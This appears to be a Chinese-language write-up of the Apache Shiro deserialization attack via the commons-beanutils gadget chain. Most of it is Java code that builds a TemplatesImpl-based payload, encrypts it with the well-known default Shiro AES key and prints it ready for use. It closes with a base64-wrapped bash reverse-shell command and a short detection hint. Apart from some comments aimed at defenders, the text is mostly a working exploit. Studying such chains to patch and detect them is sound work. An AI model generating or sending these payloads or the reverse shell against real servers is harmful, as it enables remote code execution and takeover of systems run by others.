
Apache Shiro 反序列化及利用链

无依赖调用链:

/**
 * Plain mutable bean exposing two properties, {@code name} and {@code age}.
 *
 * <p>The accessors follow the JavaBeans naming convention, so a reflective
 * property reader can resolve the property name {@code "age"} to
 * {@link #getAge()} and {@code "name"} to {@link #getName()}.
 */
public class Person {

    private int age;
    private String name;

    /**
     * Creates a person with the given name and age.
     *
     * @param name initial value of the {@code name} property
     * @param age initial value of the {@code age} property
     */
    public Person(String name, int age) {
        this.age = age;
        this.name = name;
    }

    /** @return the current {@code age} value */
    public int getAge() {
        return this.age;
    }

    /** @param age new {@code age} value */
    public void setAge(int age) {
        this.age = age;
    }

    /** @return the current {@code name} value */
    public String getName() {
        return this.name;
    }

    /** @param name new {@code name} value */
    public void setName(String name) {
        this.name = name;
    }
}

getter 方法调用链流程

CC3链:

import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
import org.apache.commons.beanutils.PropertyUtils;

import java.lang.reflect.Field;
import java.nio.file.Files;
import java.nio.file.Paths;

/**
 * Local, single-process demonstration of why reflective getter invocation on an
 * untrusted object graph amounts to code execution.
 *
 * <p>{@code PropertyUtils.getProperty(bean, "outputProperties")} resolves the
 * property name to {@code getOutputProperties()}. On {@code TemplatesImpl} that
 * getter is not a passive accessor: it builds a transformer from the class bytes
 * held in the private {@code _bytecodes} field. Any code path that reads a
 * caller-chosen property from a deserialized object therefore has to be treated
 * as a method-invocation sink during review.
 */
public class BeanTest {

    public static void main(String[] args) throws Exception {
        Person person = new Person("Le1a", 20);
        // Sanity check of PropertyUtils on a harmless bean (left disabled by the author):
        // System.out.println(PropertyUtils.getProperty(person, "age"));

        TemplatesImpl tpl = new TemplatesImpl();

        // Private state is written through reflection because TemplatesImpl offers no
        // public setters for it; presumably _name and _tfactory only need to be
        // populated for the getter to reach the class-loading step (confirm against the JDK).
        Field nameField = accessibleField(TemplatesImpl.class, "_name");
        nameField.set(tpl, "aaaa");

        Field bytecodesField = accessibleField(TemplatesImpl.class, "_bytecodes");

        Field tfactoryField = accessibleField(TemplatesImpl.class, "_tfactory");
        tfactoryField.set(tpl, new TransformerFactoryImpl());

        // Pre-compiled class file read from the author's local build output.
        byte[] classBytes = Files.readAllBytes(Paths.get("D:\\Cc\\IntelliJ IDEA2021.1\\Code\\out\\production\\Code\\ClassLoader\\Hacker.class"));
        bytecodesField.set(tpl, new byte[][] {classBytes});

        // The property read is the trigger: it ends in getOutputProperties().
        PropertyUtils.getProperty(tpl, "outputProperties");
    }

    /** Looks up a field declared directly on {@code owner} and makes it writable. */
    private static Field accessibleField(Class<?> owner, String fieldName) throws Exception {
        Field field = owner.getDeclaredField(fieldName);
        field.setAccessible(true);
        return field;
    }
}

问题:

import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
import org.apache.commons.beanutils.BeanComparator;
import org.apache.shiro.crypto.AesCipherService;
import org.apache.shiro.util.ByteSource;

import java.io.*;
import java.lang.reflect.Field;
import java.nio.file.Files;
import java.nio.file.Paths;
import java.util.Base64;
import java.util.PriorityQueue;


/**
 * Builds a serialized {@code PriorityQueue} -> {@code BeanComparator} ->
 * {@code TemplatesImpl} object graph, encrypts it with Shiro's
 * {@code AesCipherService} under a hard-coded key, and prints the result.
 *
 * <p>Review notes for defenders (the server side is not shown on this page):
 * <ul>
 *   <li>The graph references only commons-beanutils and JDK classes, because an
 *       explicit JDK comparator is handed to {@code BeanComparator}. Not having
 *       commons-collections on the classpath is therefore not a mitigation.</li>
 *   <li>The blob is only accepted by a deployment whose cipher key equals the
 *       Base64 key below. NOTE(review): this looks like the widely published
 *       default key from old Shiro releases - confirm, and rotate any deployment
 *       still using it to a randomly generated, per-deployment key.</li>
 *   <li>Restricting which classes may be deserialized (for example with a JDK
 *       {@code ObjectInputFilter}) and keeping Shiro and commons-beanutils up to
 *       date remove the precondition this listing depends on.</li>
 * </ul>
 *
 * <p>Statement order in {@code main} is significant: the queue is populated with
 * stub strings first and only afterwards rewired through reflection, so no
 * comparison against the {@code TemplatesImpl} instance happens while the graph
 * is being built.
 */
public class CBAttck {
    /**
     * Assembles the object graph, serializes it, encrypts it and prints it to stdout.
     *
     * @param args unused
     * @throws Exception on any file, reflection, serialization or cipher failure
     */
    public static void main(String[] args) throws Exception{
        // Pre-compiled class file read from the author's local build output.
        byte[] code = Files.readAllBytes(Paths.get("D:\\Cc\\IntelliJ IDEA 2021.1\\Code\\out\\production\\Code\\ClassLoader\\Hacker.class"));
        byte[][] codes = {code};// class bytes; the author labels this "malicious class"
        // TemplatesImpl carrier (the author's "CC3" part): private fields are set reflectively.
        TemplatesImpl obj = new TemplatesImpl();
        setFieldValue(obj, "_bytecodes",codes);
        setFieldValue(obj, "_name", "aaaa");
        setFieldValue(obj, "_tfactory", new TransformerFactoryImpl());
        // commons-beanutils part: property is null for now, and the JDK's
        // case-insensitive String comparator is supplied explicitly.
        BeanComparator comparator = new BeanComparator(null,String.CASE_INSENSITIVE_ORDER);
        final PriorityQueue<Object> queue = new PriorityQueue<Object>(2, comparator);
        // stub data for replacement later: plain strings, so add() compares harmless values
        queue.add("1");
        queue.add("1");
        // Only now point the comparator at the getter-backed property and swap the
        // queue's backing array for the TemplatesImpl instance.
        setFieldValue(comparator, "property", "outputProperties");
        setFieldValue(queue, "queue", new Object[]{obj, obj});

        // Standard Java serialization of the finished graph into memory.
        ByteArrayOutputStream barr = new ByteArrayOutputStream();
        ObjectOutputStream oos = new ObjectOutputStream(barr);
        oos.writeObject(queue);
        oos.close();

        byte[] payload= barr.toByteArray();
        AesCipherService aes = new AesCipherService();
        // NOTE(review): hard-coded key; see the class comment about rotating it.
        byte [] key = Base64.getDecoder().decode("kPH+bIxk5D2deZiIxcaaaA==");
        ByteSource finalpayload = aes.encrypt(payload,key);
        // presumably prints the Base64 form of the ciphertext - confirm ByteSource.toString()
        System.out.println(finalpayload.toString());
    }
    /**
     * Writes {@code value} into the named field of {@code obj}, bypassing access checks.
     *
     * <p>The lookup uses {@code getDeclaredField} on the object's runtime class, so only
     * fields declared directly on that class are found; inherited fields are not.
     *
     * @param obj object whose field is overwritten
     * @param fieldName name of a field declared on {@code obj.getClass()}
     * @param value value to store
     * @throws Exception if the field does not exist or cannot be written
     */
    public static void setFieldValue(Object obj, String fieldName, Object value) throws Exception {
        Field field = obj.getClass().getDeclaredField(fieldName);
        field.setAccessible(true);
        field.set(obj, value);
    }
}

bash -c {echo,Base64编码}|{base64,-d}|{bash,-i}

注:上面的"Base64编码"指 bash -i >& /dev/tcp/IP/端口 0>&1 的 Base64 编码。检测侧可关注由 Java 应用进程派生、命令行中同时出现 {echo, 与 {base64,-d} 的 bash 子进程。
